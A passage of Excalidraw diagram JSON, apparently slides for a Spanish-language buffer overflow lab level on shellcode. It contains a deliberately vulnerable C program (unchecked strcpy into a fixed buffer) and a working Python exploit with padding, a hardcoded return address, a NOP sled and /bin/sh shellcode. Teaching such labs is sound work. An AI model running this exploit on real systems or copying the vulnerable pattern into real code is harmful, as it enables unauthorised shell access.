			"angle": 0,
			"x": 1509.7331778866965,
			"y": -339.7510724490962,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 22.728286743164062,
			"height": 34.56630636476277,
			"seed": 880181409,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961285,
			"link": null,
			"locked": false,
			"fontSize": 27.653045091810213,
			"fontFamily": 1,
			"text": "...",
			"rawText": "...",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "...",
			"lineHeight": 1.25,
			"baseline": 24
		},
		{
			"type": "arrow",
			"version": 84,
			"versionNonce": 35874351,
			"isDeleted": false,
			"id": "hJYuwqkmRY2WHsY1-5n-X",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1366.993241691645,
			"y": -470.3477077835531,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 68.6446773981861,
			"height": 0.8800458220900396,
			"seed": 216376289,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523453,
			"link": null,
			"locked": false,
			"startBinding": {
				"elementId": "swTUI-6W91NPuaoCW0Rzp",
				"focus": -0.07885532188031856,
				"gap": 26.09785349075446
			},
			"endBinding": {
				"elementId": "4pGvF0p3s8fnqbxt8p7sS",
				"focus": 0.09793527919806272,
				"gap": 12.673220457522348
			},
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					68.6446773981861,
					-0.8800458220900396
				]
			]
		},
		{
			"type": "text",
			"version": 48,
			"versionNonce": 1060228264,
			"isDeleted": false,
			"id": "QTrUOTVk",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1366.0932143304826,
			"y": -521.7812313379793,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 66.91195678710938,
			"height": 40,
			"seed": 2092579471,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961285,
			"link": null,
			"locked": false,
			"fontSize": 16,
			"fontFamily": 1,
			"text": "payload \ncorrecto",
			"rawText": "payload \ncorrecto",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "payload \ncorrecto",
			"lineHeight": 1.25,
			"baseline": 34
		},
		{
			"type": "text",
			"version": 1112,
			"versionNonce": 1595716056,
			"isDeleted": false,
			"id": "qWPQOGsb",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": 719.8903478117277,
			"y": -226.65305891846765,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 684.8138427734375,
			"height": 36.761935064214214,
			"seed": 1813714913,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961285,
			"link": null,
			"locked": false,
			"fontSize": 29.409548051371374,
			"fontFamily": 1,
			"text": "(Extra) Nivel4: Diseño y ejecución de shellcode:",
			"rawText": "(Extra) Nivel4: Diseño y ejecución de shellcode:",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "(Extra) Nivel4: Diseño y ejecución de shellcode:",
			"lineHeight": 1.25,
			"baseline": 26
		},
		{
			"type": "text",
			"version": 4522,
			"versionNonce": 702280152,
			"isDeleted": false,
			"id": "bXkyLUOv",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": 718.9913278744198,
			"y": -168.07767678860455,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 931.959228515625,
			"height": 375,
			"seed": 395277249,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727609600610,
			"link": null,
			"locked": false,
			"fontSize": 20,
			"fontFamily": 1,
			"text": "Objetivo a atacar: Ejecutable de programa vulnerable, se introducirá un argumento \nque servirá como payload.\n\nFuncionamiento del programa: El funcionamiento del programa será parecido al anterior. \nUna función llamada overflow insertará el primer argumento en un buffer, dando la opción de\ndesbordar el programa.\n\nComo superar el nivel: El objetivo final será ejecutar una shell de comandos, para ello el \nusuario tendrá que crear y ejecutar un exploit que manipula la dirección de la pila para \nejecutar la shell. Habrá un esqueleto de exploit llamado level4.py\n\nLa lógica empleada es muy parecida a la del nivel3, sin embargo con el extra de la ejecucion \nde la shell el usuario entenderá por completo como esta vulnerabilidad puede hacer que los \natacantes tomen el control de una maquina.\n",
			"rawText": "Objetivo a atacar: Ejecutable de programa vulnerable, se introducirá un argumento \nque servirá como payload.\n\nFuncionamiento del programa: El funcionamiento del programa será parecido al anterior. \nUna función llamada overflow insertará el primer argumento en un buffer, dando la opción de\ndesbordar el programa.\n\nComo superar el nivel: El objetivo final será ejecutar una shell de comandos, para ello el \nusuario tendrá que crear y ejecutar un exploit que manipula la dirección de la pila para \nejecutar la shell. Habrá un esqueleto de exploit llamado level4.py\n\nLa lógica empleada es muy parecida a la del nivel3, sin embargo con el extra de la ejecucion \nde la shell el usuario entenderá por completo como esta vulnerabilidad puede hacer que los \natacantes tomen el control de una maquina.\n",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Objetivo a atacar: Ejecutable de programa vulnerable, se introducirá un argumento \nque servirá como payload.\n\nFuncionamiento del programa: El funcionamiento del programa será parecido al anterior. \nUna función llamada overflow insertará el primer argumento en un buffer, dando la opción de\ndesbordar el programa.\n\nComo superar el nivel: El objetivo final será ejecutar una shell de comandos, para ello el \nusuario tendrá que crear y ejecutar un exploit que manipula la dirección de la pila para \nejecutar la shell. Habrá un esqueleto de exploit llamado level4.py\n\nLa lógica empleada es muy parecida a la del nivel3, sin embargo con el extra de la ejecucion \nde la shell el usuario entenderá por completo como esta vulnerabilidad puede hacer que los \natacantes tomen el control de una maquina.\n",
			"lineHeight": 1.25,
			"baseline": 368
		},
		{
			"type": "text",
			"version": 312,
			"versionNonce": 1230550744,
			"isDeleted": false,
			"id": "i0teAxG4",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 720.5952108861779,
			"y": 216.33897122398434,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 449.203125,
			"height": 348.13995016527787,
			"seed": 1409085263,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961287,
			"link": null,
			"locked": false,
			"fontSize": 10.36130804063327,
			"fontFamily": 3,
			"text": "Codigo:\n\n#include <stdio.h>\n#include <string.h>\n\nvoid overflow(char *arg){\n  char buff[40]; \n  strcpy(buff, arg);\n  printf(\"Buffer content: %s\\n\", buff);\n\n  return 0;\n}\n\n\nint main(int argc, char *argv[]) {\n  printf(\"NIVEL BONUS!!! Podras ejecutar una shell de comandos??? \\n \\n\");\n  if(argc != 2){\n    printf(\"Uso: %s <payload>\\n\", argv[0]);\n    return 1;\n  }\n\n  overflow(argv[1]);\n  return 0;\n}\n\n\n\n",
			"rawText": "Codigo:\n\n#include <stdio.h>\n#include <string.h>\n\nvoid overflow(char *arg){\n  char buff[40]; \n  strcpy(buff, arg);\n  printf(\"Buffer content: %s\\n\", buff);\n\n  return 0;\n}\n\n\nint main(int argc, char *argv[]) {\n  printf(\"NIVEL BONUS!!! Podras ejecutar una shell de comandos??? \\n \\n\");\n  if(argc != 2){\n    printf(\"Uso: %s <payload>\\n\", argv[0]);\n    return 1;\n  }\n\n  overflow(argv[1]);\n  return 0;\n}\n\n\n\n",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Codigo:\n\n#include <stdio.h>\n#include <string.h>\n\nvoid overflow(char *arg){\n  char buff[40]; \n  strcpy(buff, arg);\n  printf(\"Buffer content: %s\\n\", buff);\n\n  return 0;\n}\n\n\nint main(int argc, char *argv[]) {\n  printf(\"NIVEL BONUS!!! Podras ejecutar una shell de comandos??? \\n \\n\");\n  if(argc != 2){\n    printf(\"Uso: %s <payload>\\n\", argv[0]);\n    return 1;\n  }\n\n  overflow(argv[1]);\n  return 0;\n}\n\n\n\n",
			"lineHeight": 1.2,
			"baseline": 345
		},
		{
			"type": "text",
			"version": 740,
			"versionNonce": 1472948648,
			"isDeleted": false,
			"id": "XruaClq2",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1215.843088465118,
			"y": 220.11865541970155,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 406.69921875,
			"height": 151.4773681818974,
			"seed": 1278037601,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [
				{
					"id": "T692gqJvdejM2NRwG8_ik",
					"type": "arrow"
				}
			],
			"updated": 1727609804751,
			"link": null,
			"locked": false,
			"fontSize": 12.623114015158116,
			"fontFamily": 3,
			"text": "import struct\nrelleno = \"\\x41\" * 76\nEIP = struct.pack(\"I\", 0xbffff780)\nshellcode = \"\\x31\\xc0\\x31\\xdb\\xb0\\x06\\xcd\\x80\\x53\\x68\"\\\n            \"/tty\\x68/dev\\x89\\xe3\\x31\\xc9\\x66\\xb9\\x12\"\\\n            \"\\x27\\xb0\\x05\\xcd\\x80\\x31\\xc0\\x50\\x68//sh\"\\\n            \"\\x68/bin\\x89\\xe3\\x50\\x53\\x89\\xe1\\x99\\xb0\"\\\n            \"\\x0b\\xcd\\x80\"\nNOP = \"\\x90\" * 100\nprint relleno + EIP + NOP + shellcode",
			"rawText": "import struct\nrelleno = \"\\x41\" * 76\nEIP = struct.pack(\"I\", 0xbffff780)\nshellcode = \"\\x31\\xc0\\x31\\xdb\\xb0\\x06\\xcd\\x80\\x53\\x68\"\\\n            \"/tty\\x68/dev\\x89\\xe3\\x31\\xc9\\x66\\xb9\\x12\"\\\n            \"\\x27\\xb0\\x05\\xcd\\x80\\x31\\xc0\\x50\\x68//sh\"\\\n            \"\\x68/bin\\x89\\xe3\\x50\\x53\\x89\\xe1\\x99\\xb0\"\\\n            \"\\x0b\\xcd\\x80\"\nNOP = \"\\x90\" * 100\nprint relleno + EIP + NOP + shellcode",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "import struct\nrelleno = \"\\x41\" * 76\nEIP = struct.pack(\"I\", 0xbffff780)\nshellcode = \"\\x31\\xc0\\x31\\xdb\\xb0\\x06\\xcd\\x80\\x53\\x68\"\\\n            \"/tty\\x68/dev\\x89\\xe3\\x31\\xc9\\x66\\xb9\\x12\"\\\n            \"\\x27\\xb0\\x05\\xcd\\x80\\x31\\xc0\\x50\\x68//sh\"\\\n            \"\\x68/bin\\x89\\xe3\\x50\\x53\\x89\\xe1\\x99\\xb0\"\\\n            \"\\x0b\\xcd\\x80\"\nNOP = \"\\x90\" * 100\nprint relleno + EIP + NOP + shellcode",
			"lineHeight": 1.2,
			"baseline": 148
		},
		{
			"type": "rectangle",
			"version": 204,
			"versionNonce": 585908367,
			"isDeleted": false,
			"id": "ljY6pg0oBoMj2IRnv5Qpg",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 751.0711561513864,
			"y": 581.7705564896461,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 911.6682465080024,
			"height": 47.74321599503082,
			"seed": 1766214401,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 3
			},
			"boundElements": [],
			"updated": 1711359523453,
			"link": null,
			"locked": false
		},
		{
			"type": "line",
			"version": 67,
			"versionNonce": 23139297,
			"isDeleted": false,
			"id": "LMZKwY31XhpczG_vxDRc4",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 863.4967197269227,
			"y": 581.0679556771838,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 1.379675986680013,
			"height": 48.97921821037835,
			"seed": 1354375137,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523453,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					-1.379675986680013,
					48.97921821037835
				]
			]
		},
		{
			"type": "line",
			"version": 50,
			"versionNonce": 265508527,
			"isDeleted": false,
			"id": "kuLXGMVEQtY_fFp60pMYn",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1090.456878815326,
			"y": 582.447631663864,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 1.3797240322292055,
			"height": 49.669104249267434,
			"seed": 1447830063,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523454,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					1.3797240322292055,
					49.669104249267434
				]
			]
		},
		{
			"type": "line",
			"version": 53,
			"versionNonce": 179695553,
			"isDeleted": false,
			"id": "hVEtNMlDcAi9EHRm7zvU-",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1161.511249131429,
			"y": 581.0679556771838,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 1.3797240322292055,
			"height": 51.04878023594756,
			"seed": 1608590049,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523454,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					1.3797240322292055,
					51.04878023594756
				]
			]
		},
		{
			"type": "line",
			"version": 69,
			"versionNonce": 397584591,
			"isDeleted": false,
			"id": "5UX0t33UIjTCsYX0RY5m5",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1233.2555535319698,
			"y": 581.7577936705238,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0.6898379933402339,
			"height": 47.599542223698336,
			"seed": 149736815,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523454,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0.6898379933402339,
					13.796976071771496
				],
				[
					0,
					47.599542223698336
				]
			]
		},
		{
			"type": "text",
			"version": 35,
			"versionNonce": 2009865176,
			"isDeleted": false,
			"id": "AsRWbSfy",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 792.1956835619682,
			"y": 580.3663124569787,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 30.394874408109303,
			"height": 46.22603333817899,
			"seed": 590696335,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961289,
			"link": null,
			"locked": false,
			"fontSize": 36.980826670543195,
			"fontFamily": 1,
			"text": "...",
			"rawText": "...",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "...",
			"lineHeight": 1.25,
			"baseline": 32
		},
		{
			"type": "text",
			"version": 223,
			"versionNonce": 1333145000,
			"isDeleted": false,
			"id": "gd4KyiLU",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 907.8559151219908,
			"y": 589.0732251284588,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 139.0318145751953,
			"height": 39.221544038290766,
			"seed": 273395937,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961289,
			"link": null,
			"locked": false,
			"fontSize": 31.377235230632614,
			"fontFamily": 1,
			"text": "buff[32]",
			"rawText": "buff[32]",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "buff[32]",
			"lineHeight": 1.25,
			"baseline": 27
		},
		{
			"type": "text",
			"version": 56,
			"versionNonce": 836269016,
			"isDeleted": false,
			"id": "yWQmrZ9i",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1104.908499515754,
			"y": 593.7719683846988,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 44.08883390368408,
			"height": 26.67818637364431,
			"seed": 1859546177,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727617947079,
			"link": null,
			"locked": false,
			"fontSize": 21.34254909891545,
			"fontFamily": 1,
			"text": "RBP",
			"rawText": "RBP",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "RBP",
			"lineHeight": 1.25,
			"baseline": 18
		},
		{
			"type": "text",
			"version": 97,
			"versionNonce": 1291539880,
			"isDeleted": false,
			"id": "r16mWkkZ",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1175.1414831252025,
			"y": 594.1904635074599,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 42.55667875236759,
			"height": 28.23871143925719,
			"seed": 1624869231,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727617947079,
			"link": null,
			"locked": false,
			"fontSize": 22.590969151405755,
			"fontFamily": 1,
			"text": "RIP",
			"rawText": "RIP",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "RIP",
			"lineHeight": 1.25,
			"baseline": 19
		},
		{
			"type": "text",
			"version": 116,
			"versionNonce": 1193870808,
			"isDeleted": false,
			"id": "Ya6y72v8",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1429.8628409134105,
			"y": 579.0202429319859,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 31.774449660128017,
			"height": 48.32415984253887,
			"seed": 1195476207,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961289,
			"link": null,
			"locked": false,
			"fontSize": 38.65932787403109,
			"fontFamily": 1,
			"text": "...",
			"rawText": "...",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "...",
			"lineHeight": 1.25,
			"baseline": 34
		},
		{
			"type": "rectangle",
			"version": 327,
			"versionNonce": 398919471,
			"isDeleted": false,
			"id": "f7hyaaxMw66MNfSbrrGav",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 756.0007996954968,
			"y": 699.9785898936352,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 911.6682465080024,
			"height": 47.74321599503082,
			"seed": 370066145,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 3
			},
			"boundElements": [
				{
					"id": "939G0ZtRZO-ci7zSPgXb0",
					"type": "arrow"
				}
			],
			"updated": 1711359523454,
			"link": null,
			"locked": false
		},
		{
			"type": "line",
			"version": 187,
			"versionNonce": 1903396673,
			"isDeleted": false,
			"id": "RUXBQVEfquT8SiPlA12qy",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 868.426363271033,
			"y": 699.2759890811731,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 1.379675986680013,
			"height": 48.97921821037835,
			"seed": 1003863745,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523454,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					-1.379675986680013,
					48.97921821037835
				]
			]
		},
		{
			"type": "line",
			"version": 220,
			"versionNonce": 920406351,
			"isDeleted": false,
			"id": "On8COnoYbEgrRdP7nrFx8",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1075.948022713459,
			"y": 701.8964307831534,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 1.3797240322292055,
			"height": 49.669104249267434,
			"seed": 722615969,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523454,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					1.3797240322292055,
					49.669104249267434
				]
			]
		},
		{
			"type": "line",
			"version": 222,
			"versionNonce": 1793259297,
			"isDeleted": false,
			"id": "2s9MTFWHNQUe-17GIHdrH",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1144.934469373912,
			"y": 699.2759890811731,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 1.3797240322292055,
			"height": 51.04878023594756,
			"seed": 578011777,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523454,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					1.3797240322292055,
					51.04878023594756
				]
			]
		},
		{
			"type": "line",
			"version": 253,
			"versionNonce": 1648641903,
			"isDeleted": false,
			"id": "9wTh-NgvPW8Uq8T8D9NOl",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1269.6176020762316,
			"y": 700.7930426244144,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0.6898379933402339,
			"height": 47.599542223698336,
			"seed": 1589234273,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523454,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0.6898379933402339,
					13.796976071771496
				],
				[
					0,
					47.599542223698336
				]
			]
		},
		{
			"type": "text",
			"version": 155,
			"versionNonce": 1614078888,
			"isDeleted": false,
			"id": "E9Lr9LdW",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 797.1253271060785,
			"y": 698.5743458609679,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 30.394874408109303,
			"height": 46.22603333817899,
			"seed": 1488180801,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961290,
			"link": null,
			"locked": false,
			"fontSize": 36.980826670543195,
			"fontFamily": 1,
			"text": "...",
			"rawText": "...",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "...",
			"lineHeight": 1.25,
			"baseline": 32
		},
		{
			"type": "text",
			"version": 433,
			"versionNonce": 347769560,
			"isDeleted": false,
			"id": "V5ddS4XL",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 873.4685654682554,
			"y": 708.8539163539986,
			"strokeColor": "#e03131",
			"backgroundColor": "transparent",
			"width": 267.52337646484375,
			"height": 39.221544038290766,
			"seed": 1128359457,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961290,
			"link": null,
			"locked": false,
			"fontSize": 31.377235230632614,
			"fontFamily": 1,
			"text": "AAAAAAAAAAAAA",
			"rawText": "AAAAAAAAAAAAA",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "AAAAAAAAAAAAA",
			"lineHeight": 1.25,
			"baseline": 27
		},
		{
			"type": "text",
			"version": 166,
			"versionNonce": 304754344,
			"isDeleted": false,
			"id": "oRTfqg4U",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1157.1140370727683,
			"y": 717.2571196372768,
			"strokeColor": "#e03131",
			"backgroundColor": "transparent",
			"width": 107.28861999511719,
			"height": 24.135847311300456,
			"seed": 295890127,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961290,
			"link": null,
			"locked": false,
			"fontSize": 19.308677849040365,
			"fontFamily": 1,
			"text": "oxbffff780",
			"rawText": "oxbffff780",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "oxbffff780",
			"lineHeight": 1.25,
			"baseline": 17
		},
		{
			"type": "text",
			"version": 164,
			"versionNonce": 533950424,
			"isDeleted": false,
			"id": "dM2SCeAF",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1291.8891537171617,
			"y": 711.2638158721721,
			"strokeColor": "#e03131",
			"backgroundColor": "transparent",
			"width": 79.34188842773438,
			"height": 34.77286019682633,
			"seed": 40286031,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961291,
			"link": null,
			"locked": false,
			"fontSize": 27.818288157461062,
			"fontFamily": 1,
			"text": "NOP...",
			"rawText": "NOP...",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "NOP...",
			"lineHeight": 1.25,
			"baseline": 24
		},
		{
			"type": "text",
			"version": 215,
			"versionNonce": 222173608,
			"isDeleted": false,
			"id": "M9kMANbP",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1458.764318429669,
			"y": 709.0088152462702,
			"strokeColor": "#e03131",
			"backgroundColor": "transparent",
			"width": 123.32150268554688,
			"height": 36.00187392104704,
			"seed": 197770255,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961291,
			"link": null,
			"locked": false,
			"fontSize": 28.801499136837634,
			"fontFamily": 1,
			"text": "shellcode",
			"rawText": "shellcode",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "shellcode",
			"lineHeight": 1.25,
			"baseline": 26
		},
		{
			"type": "line",
			"version": 45,
			"versionNonce": 770812367,
			"isDeleted": false,
			"id": "UT6AJit0_Q_OkjDa5iBPV",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1385.3065093286946,
			"y": 746.1363122531843,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0,
			"height": 44.80534728180055,
			"seed": 612931951,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523455,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0,
					-44.80534728180055
				]
			]
		},
		{
			"type": "arrow",
			"version": 450,
			"versionNonce": 582082209,
			"isDeleted": false,
			"id": "939G0ZtRZO-ci7zSPgXb0",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1207.6855081993358,
			"y": 687.7293387042043,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 116.01364165140649,
			"height": 46.40545666056255,
			"seed": 1846391873,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523455,
			"link": null,
			"locked": false,
			"startBinding": {
				"elementId": "f7hyaaxMw66MNfSbrrGav",
				"focus": -0.16491985712273688,
				"gap": 12.249251189430879
			},
			"endBinding": {
				"elementId": "f7hyaaxMw66MNfSbrrGav",
				"focus": 0.26541677847020817,
				"gap": 13.049278016903827
			},
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					102.41207110804294,
					-46.40545666056255
				],
				[
					116.01364165140649,
					-0.8000268274729478
				]
			]
		},
		{
